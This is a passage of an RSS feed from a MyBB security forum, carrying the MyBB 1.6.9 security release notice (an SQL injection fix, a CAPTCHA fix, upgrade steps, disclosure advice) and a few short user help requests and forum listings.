			<description><![CDATA[MyBB 1.6.9 is now available from the MyBB website and is a security release for the 1.6 series.<br />
<br />
<br />
<span style="font-weight: bold;">What's added/changed in this version?</span><br />
It has come to our attention that there is an SQL injection vulnerability in all versions of MyBB, including MyBB 1.6.8. We advise all MyBB forum owners to upgrade their forum as soon as possible.<br />
<br />
With thanks to frostschutz and StefanT for finding and reporting these issues.<br />
<br />
Vulnerabilities fixed:<ul>
<li>High Risk: An SQL vulnerability when editing a post</li>
<li>Medium Risk: CAPTCHA systems non effective, providing possible brute-force access<br />
</li></ul>
Bugs fixed:<ul>
<li>An issue with the editor not working in Firefox 16 and above<br />
</li></ul>
We apologise for any inconvenience.<br />
<br />
<br />
<span style="font-weight: bold;">Upgrading from 1.6.8 and Other Versions</span><br />
Before performing any upgrade please remember to backup your forum's files and database and store them safely. If you have edited core files, including language files, please make sure you make a changelog for these changes so you can make them again once the upgrade is complete.<br />
<br />
To upgrade, follow the Upgrading process. The <span style="font-weight: bold;">upgrade script</span> is required. There are changes to <span style="font-weight: bold;">1 language file</span> (<span style="font-style: italic;">messages.lang.php</span>). There are changes to <span style="font-weight: bold;">3 templates</span> (<span style="font-style: italic;">portal_welcome_guesttext</span>, <span style="font-style: italic;">loginbox</span> &amp; <span style="font-style: italic;">codebuttons</span>).<br />
<blockquote><cite>Quote:</cite>If you're using MyBB 1.6.8<ul>
<li><a href="http://resources.mybb.com/downloads/changedfiles_1609.zip" target="_blank">Download and use the Changed Files Package</a></li>
<li>Follow the <a href="http://docs.mybb.com/Upgrading.html" target="_blank">upgrading instructions</a><br />
</li></ul>
If you’re using MyBB 1.6.7 or below<ul>
<li><a href="http://resources.mybb.com/downloads/mybb_1609.zip" target="_blank">Download and use the full 1.6.9 Release Package</a></li>
<li>Follow the <a href="http://docs.mybb.com/Upgrading.html" target="_blank">upgrading instructions</a><br />
</li></ul>
</blockquote>
<br />
<br />
<span style="font-weight: bold;">Reporting MyBB Security Vulnerabilities</span><br />
If you think you’ve found a vulnerability in MyBB, we advise you not to publicly post it on these forums or publicly release information about it elsewhere until we’ve had time to prepare and release a patch.<br />
<br />
As always, you can send through security related messages on the MyBB website from the Contact Us page or in our <a href="http://community.mybb.com/forum-135.html" target="_blank">Private Inquiries</a> forum – where you can start a new thread that only you and the MyBB Team can see.<br />
<br />
Thank you,<br />
<br />
MyBB Team]]></description>
			<content:encoded><![CDATA[MyBB 1.6.9 is now available from the MyBB website and is a security release for the 1.6 series.<br />
<br />
<br />
<span style="font-weight: bold;">What's added/changed in this version?</span><br />
It has come to our attention that there is an SQL injection vulnerability in all versions of MyBB, including MyBB 1.6.8. We advise all MyBB forum owners to upgrade their forum as soon as possible.<br />
<br />
With thanks to frostschutz and StefanT for finding and reporting these issues.<br />
<br />
Vulnerabilities fixed:<ul>
<li>High Risk: An SQL vulnerability when editing a post</li>
<li>Medium Risk: CAPTCHA systems non effective, providing possible brute-force access<br />
</li></ul>
Bugs fixed:<ul>
<li>An issue with the editor not working in Firefox 16 and above<br />
</li></ul>
We apologise for any inconvenience.<br />
<br />
<br />
<span style="font-weight: bold;">Upgrading from 1.6.8 and Other Versions</span><br />
Before performing any upgrade please remember to backup your forum's files and database and store them safely. If you have edited core files, including language files, please make sure you make a changelog for these changes so you can make them again once the upgrade is complete.<br />
<br />
To upgrade, follow the Upgrading process. The <span style="font-weight: bold;">upgrade script</span> is required. There are changes to <span style="font-weight: bold;">1 language file</span> (<span style="font-style: italic;">messages.lang.php</span>). There are changes to <span style="font-weight: bold;">3 templates</span> (<span style="font-style: italic;">portal_welcome_guesttext</span>, <span style="font-style: italic;">loginbox</span> &amp; <span style="font-style: italic;">codebuttons</span>).<br />
<blockquote><cite>Quote:</cite>If you're using MyBB 1.6.8<ul>
<li><a href="http://resources.mybb.com/downloads/changedfiles_1609.zip" target="_blank">Download and use the Changed Files Package</a></li>
<li>Follow the <a href="http://docs.mybb.com/Upgrading.html" target="_blank">upgrading instructions</a><br />
</li></ul>
If you’re using MyBB 1.6.7 or below<ul>
<li><a href="http://resources.mybb.com/downloads/mybb_1609.zip" target="_blank">Download and use the full 1.6.9 Release Package</a></li>
<li>Follow the <a href="http://docs.mybb.com/Upgrading.html" target="_blank">upgrading instructions</a><br />
</li></ul>
</blockquote>
<br />
<br />
<span style="font-weight: bold;">Reporting MyBB Security Vulnerabilities</span><br />
If you think you’ve found a vulnerability in MyBB, we advise you not to publicly post it on these forums or publicly release information about it elsewhere until we’ve had time to prepare and release a patch.<br />
<br />
As always, you can send through security related messages on the MyBB website from the Contact Us page or in our <a href="http://community.mybb.com/forum-135.html" target="_blank">Private Inquiries</a> forum – where you can start a new thread that only you and the MyBB Team can see.<br />
<br />
Thank you,<br />
<br />
MyBB Team]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Hacking usernames]]></title>
			<link>http://www.mybbsecurity.net/topic-hacking-usernames</link>
			<pubDate>Tue, 04 Dec 2012 20:21:03 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-hacking-usernames</guid>
			<description><![CDATA[Hi<br />
My forum version is 1.6.8 (1608) and has been updated<br />
But while some of the usernames will be hacked<br />
Other users will enter a person's name<br />
What would you do?<br />
Grateful]]></description>
			<content:encoded><![CDATA[Hi<br />
My forum version is 1.6.8 (1608) and has been updated<br />
But while some of the usernames will be hacked<br />
Other users will enter a person's name<br />
What would you do?<br />
Grateful]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[indya forums]]></title>
			<link>http://www.mybbsecurity.net/topic-indya-forums--231</link>
			<pubDate>Wed, 28 Nov 2012 08:14:37 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-indya-forums--231</guid>
			<description><![CDATA[<div style="text-align: center;"><img src="http://i.imgur.com/OwzhV.jpg" border="0" alt="[Image: OwzhV.jpg]" /><br />
<span style="font-weight: bold;">Forum Name: </span> indya forums<br />
<span style="font-weight: bold;">Forum URL: </span> <a href="http://indyaforums.com" target="_blank">http://indyaforums.com</a><br />
<span style="font-weight: bold;">Description:<br />
</span> A hangout place/<a href="http://indyaforums.com" target="_blank">general discussion forum</a> for indians, have tried to keep everything very minimalistic starting from categories to the postbit so that focus remains only on the discussion and nothing else.<br />
Thank you.</div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;"><img src="http://i.imgur.com/OwzhV.jpg" border="0" alt="[Image: OwzhV.jpg]" /><br />
<span style="font-weight: bold;">Forum Name: </span> indya forums<br />
<span style="font-weight: bold;">Forum URL: </span> <a href="http://indyaforums.com" target="_blank">http://indyaforums.com</a><br />
<span style="font-weight: bold;">Description:<br />
</span> A hangout place/<a href="http://indyaforums.com" target="_blank">general discussion forum</a> for indians, have tried to keep everything very minimalistic starting from categories to the postbit so that focus remains only on the discussion and nothing else.<br />
Thank you.</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[forum icon]]></title>
			<link>http://www.mybbsecurity.net/topic-forum-icon</link>
			<pubDate>Thu, 22 Nov 2012 04:57:40 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-forum-icon</guid>
			<description><![CDATA[hi admin <br />
i have buy neonglow theme from audentio.com  Mike Creuzer but i am unable to change forum icons and he is not giving support please solve my problem<br />
regard<br />
ssraiki]]></description>
			<content:encoded><![CDATA[hi admin <br />
i have buy neonglow theme from audentio.com  Mike Creuzer but i am unable to change forum icons and he is not giving support please solve my problem<br />
regard<br />
ssraiki]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[cache system for queries]]></title>
			<link>http://www.mybbsecurity.net/topic-cache-system-for-queries</link>
			<pubDate>Mon, 19 Nov 2012 11:17:53 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-cache-system-for-queries</guid>
			<description><![CDATA[I created several queries to my stats.php. I want to make my queries refresh only every 24 hours(cache system). Becuase now I have many queries to my database when somebody open stats.php<br />
<br />
Anyone has an idea?]]></description>
			<content:encoded><![CDATA[I created several queries to my stats.php. I want to make my queries refresh only every 24 hours(cache system). Becuase now I have many queries to my database when somebody open stats.php<br />
<br />
Anyone has an idea?]]></content:encoded>
		</item>
	</channel>
</rss>